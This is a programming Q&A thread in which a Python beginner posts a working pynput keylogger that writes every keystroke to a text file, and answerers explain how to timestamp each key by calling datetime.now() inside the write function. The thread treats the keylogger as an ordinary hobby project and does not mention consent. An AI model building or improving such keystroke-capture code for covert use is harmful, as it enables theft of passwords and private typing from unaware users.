# How can I display time in a file? (Python)

Tags: python, python-3.8

So, I'd like to point out that started learning Python this year and I have to say, it's really cool.I recently had the idea of making a keylogger (with some help from a tutorial ofcourse) that captures whatever a user types in a .txt file.Everything is running smoothly.Exept, I can't figure out how to make it write the date and time that the user pressed a key, right before the key, at the left side.I searched the web about it but I couldn't find something.I the date and time format from [W3schools](https://www.w3schools.com/python/python_datetime.asp).

```
import pynput
import datetime
from pynput.keyboard import Key, Listener

keys=[]
a=datetime.datetime.now()

def on_press(key):
    global keys
    keys.append(key)
    print("{0}".format(key))
    write_file(keys)
    keys=[]

def write_file(keys):
    with open("Log.txt", "a") as f:
        f.write(a.strftime("%d/%m/%Y at %H:%M"))
        for key in keys:
            k=str(key).replace("'","")
            if k.find("space")>0:
                f.write('\n')
            else:    
                f.write(k)

with Listener(on_press=on_press) as listener:
    listener.join()
```

Comment: Try and be more explicit with what your actual problem is, what you've said is that you can't make it display the time, but you could be more helpful if you said "it always displays the same time", making it quicker and easier for people to understand your problem and help you

Comment: You should edit your question to improve it. It is not clear what you are unable to do, as you say you cannot do it, but it seems you have done it.

Answer (score 1):

You only use `a=datetime.datetime.now()` once, before entering the loop, so the value of `a` doesn't change within the loop. You need to move it right before `f.write(a.strftime("%d/%m/%Y at %H:%M"))`, or alternatively replace that statement with:

```
f.write(datetime.datetime.now().strftime("%d/%m/%Y at %H:%M"))
```

Answer (score 0):

Your variable of a is defined when the program starts so the same time will be listed every time. Move the variable declaration within the write_file() function so the time updates each time a key is pressed

Answer (score 0):

When you define `a`, you set it to the time of the first run through of the program. This won't work if you want the time to change and stay updated, you will need to get the datetime within the `write_file` function.